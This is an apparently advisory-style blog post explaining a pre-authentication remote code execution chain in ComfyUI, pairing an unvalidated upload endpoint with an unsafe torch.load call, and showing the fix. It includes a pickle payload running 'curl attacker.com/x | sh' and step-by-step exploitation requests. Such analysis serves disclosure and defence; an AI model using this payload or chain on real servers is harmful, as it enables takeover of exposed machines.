DEV Community

GUIDANCE WHITE
GUIDANCE WHITE

Posted on

CVE-2026-68771 – Unauthenticated RCE in ComfyUI via Insecure Deserialization in the LoadTrainingDataset Node

Overview

Field Value
CVE ID CVE-2026-68771
Affected ComfyUI ≤ v0.23.0
Weakness CWE-502 (Deserialization of Untrusted Data)
CVSS 3.1 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Authentication required None
Fix PR #14543, commit 94ee49b

ComfyUI is a popular open-source node-graph GUI/backend for running Stable Diffusion-style diffusion models. This CVE comes from a built-in training node, LoadTrainingDataset, which deserializes .pkl files from disk using torch.load() without the safety flag weights_only=True. What makes this critical rather than just "theoretically unsafe" is that an attacker can upload that .pkl file with zero authentication in the first place.

In other words, this isn't a single bug — it's a chain of two independent flaws:

  1. A file upload endpoint that performs no content or extension validation whatsoever.
  2. A training dataset loader that deserializes that file with pickle under the hood, without the safety flag enabled.

Let's break both down.

Background: why torch.load() can be dangerous

PyTorch's torch.load() uses Python's pickle module internally. pickle isn't just a data format — it encodes, as an executable opcode stream, instructions for how to reconstruct an object during deserialization.

One of those opcodes, REDUCE, calls a (callable, args) tuple directly whenever it encounters one during unpickling. So if you plant an object like this in a pickle file:

import pickle, os

class Payload:
    def __reduce__(self):
        # When pickle "reconstructs" this object,
        # it directly executes os.system("curl attacker.com/x | sh")
        return (os.system, ("curl attacker.com/x | sh",))

with open("shard_0001.pkl", "wb") as f:
    pickle.dump({"latents": [], "conditioning": [Payload()]}, f)
Enter fullscreen mode Exit fullscreen mode

simply calling pickle.load() (or torch.load()) on this file triggers os.system(...). The act of "loading" a file — something that sounds completely passive — is itself arbitrary code execution. That's the fundamental danger of pickle-based deserialization.

To mitigate this, recent PyTorch versions support torch.load(f, weights_only=True). With this flag enabled, only "safe" types — tensors, numbers, basic containers — are allowed to be reconstructed; arbitrary Python objects (including anything with __reduce__) are rejected. The catch: on PyTorch versions older than 2.6, this flag defaults to False, and ComfyUI's node fell squarely into that gap.

Source code analysis ①: the vulnerable loader — comfy_extras/nodes_dataset.py

Here's the relevant portion of the pre-patch code.

class LoadTrainingDataset(io.ComfyNode):
    """Load encoded training dataset from disk."""

    @classmethod
    def execute(cls, folder_name):
        # 1. Open the folder_name subdirectory under the output directory
        dataset_dir = os.path.join(folder_paths.get_output_directory(), folder_name)

        if not os.path.exists(dataset_dir):
            raise ValueError(f"Dataset directory not found: {dataset_dir}")

        # 2. Collect every file matching "shard_*.pkl"
        shard_files = sorted([
            f for f in os.listdir(dataset_dir)
            if f.startswith("shard_") and f.endswith(".pkl")
        ])

        if not shard_files:
            raise ValueError(f"No shard files found in {dataset_dir}")

        all_latents = []
        all_conditioning = []

        for shard_file in shard_files:
            shard_path = os.path.join(dataset_dir, shard_file)

            with open(shard_path, "rb") as f:
                shard_data = torch.load(f)   # <-- the problematic line

            all_latents.extend(shard_data["latents"])
            all_conditioning.extend(shard_data["conditioning"])

        return io.NodeOutput(all_latents, all_conditioning)
Enter fullscreen mode Exit fullscreen mode

Walking through it line by line:

  • folder_name is a node parameter that the user (= potential attacker) supplies directly through the ComfyUI workflow graph. It defaults to "training_dataset", but any string can be passed in.
  • os.listdir(dataset_dir) sweeps up every file in that folder matching the shard_*.pkl pattern — with no check whatsoever on who wrote the file or when.
  • The critical line: shard_data = torch.load(f). No weights_only=True. This means that beyond the expected latents (tensors) and conditioning (tensors + dicts), any Python object can be reconstructed here. If the file contains an object with __reduce__, like the Payload class above, arbitrary code executes right at this line.

Reading just this snippet, the obvious question is: "sure, but doesn't the attacker still need a way to get a malicious .pkl onto the server's disk?" That's exactly the second flaw.

Source code analysis ②: unvalidated upload — /upload/image in server.py

def image_upload(post, image_save_function=None):
    image = post.get("image")
    overwrite = post.get("overwrite")

    image_upload_type = post.get("type")                      # e.g. "output"
    upload_dir, image_upload_type = get_dir_by_type(image_upload_type)

    if image and image.file:
        filename = image.filename                              # e.g. "shard_0001.pkl"
        if not filename:
            return web.Response(status=400)

        subfolder = post.get("subfolder", "")                  # e.g. "my_evil_dataset"
        full_output_folder = os.path.join(upload_dir, os.path.normpath(subfolder))
        filepath = os.path.abspath(os.path.join(full_output_folder, filename))

        # Only checks for path traversal (e.g. ../../etc/passwd)
        if os.path.commonpath((upload_dir, filepath)) != upload_dir:
            return web.Response(status=400)

        if not os.path.exists(full_output_folder):
            os.makedirs(full_output_folder)

        # ... (duplicate-filename handling logic) ...

        with open(filepath, "wb") as f:
            f.write(image.file.read())        # <-- written to disk with zero content validation

        resp = {"name": filename, "subfolder": subfolder, "type": image_upload_type}
        return web.json_response(resp)


@routes.post("/upload/image")
async def upload_image(request):
    post = await request.post()
    return image_upload(post)
Enter fullscreen mode Exit fullscreen mode

Despite the route and function being named /upload/image / image_upload, nothing here actually checks that the uploaded content is an image.

  • Calling get_dir_by_type("output") resolves the upload target to ComfyUI's output directory — all the attacker has to do is set type=output in the request.
  • subfolder is fully attacker-controlled, and this is exactly the value that later gets matched against folder_name in LoadTrainingDataset.
  • filename is also used verbatim. The attacker just needs to match the pattern LoadTrainingDataset is looking for — a shard_ prefix and a .pkl extension, e.g. shard_0001.pkl.
  • The only security check present is the os.path.commonpath comparison, which guards against escaping the output directory (path traversal) — it has nothing to do with what is being uploaded. There's no extension whitelist, no MIME-type check, no file-signature (magic byte) check.
  • And this route is registered with a plain @routes.post("/upload/image") — no authentication middleware sits in front of it. If a ComfyUI instance is exposed to the network with default settings (no auth), anyone can call this.

Net effect: regardless of its name, this endpoint is a general-purpose arbitrary-file-write primitive — write any bytes, under any filename, into any attacker-chosen subfolder of the output directory.

Where the two flaws meet

Each flaw on its own is "just" sloppy upload validation, or "just" a missing deserialization safety flag. Chained together, they form a complete, pre-auth attack path. The full flow is shown in the attached diagram.

  1. The attacker crafts a pickle payload embedding a malicious __reduce__ object, names it shard_0001.pkl, and uploads it to /upload/image with type=output and subfolder=<arbitrary_folder>. No authentication needed.
  2. The server writes it, unvalidated, to output/<arbitrary_folder>/shard_0001.pkl.
  3. The attacker submits a workflow via /prompt containing a LoadTrainingDataset node, setting folder_name to the same <arbitrary_folder> used in step 1. Also no authentication needed.
  4. During execution, the node scans that folder for shard_*.pkl files and opens them with torch.load(f). Since weights_only=True is absent, the pickle stream's REDUCE opcode executes as-is.
  5. The attacker's (callable, args) tuple is invoked, running arbitrary commands with the privileges of the ComfyUI process.

Because every step — from upload to execution — requires no authentication, any network-reachable ComfyUI instance is exploitable.

The fix

The official fix landed in PR #14543, commit 94ee49b, and the change is a single line:

             with open(shard_path, "rb") as f:
-                shard_data = torch.load(f)
+                shard_data = torch.load(f, weights_only=True)
Enter fullscreen mode Exit fullscreen mode

According to the PR description, this was the only torch.load() call in the entire codebase missing weights_only=True (other call sites, in comfy/utils.py and comfy/sd1_clip.py, already had it set). With weights_only=True enabled, pickle restoration only permits safe types — tensors, numbers, basic list/dict containers — and rejects reconstruction of arbitrary objects with __reduce__ outright. In other words, deserialization is blocked before the REDUCE opcode in step 4 ever gets a chance to run.

Note that this patch does not touch the first flaw — the lack of upload validation. /upload/image can still write arbitrary files into the output directory. What's changed is that such a file can no longer be turned into code execution through LoadTrainingDataset. This fix closes the last link in the chain (deserialization), not the entry point (upload).

Top comments (0)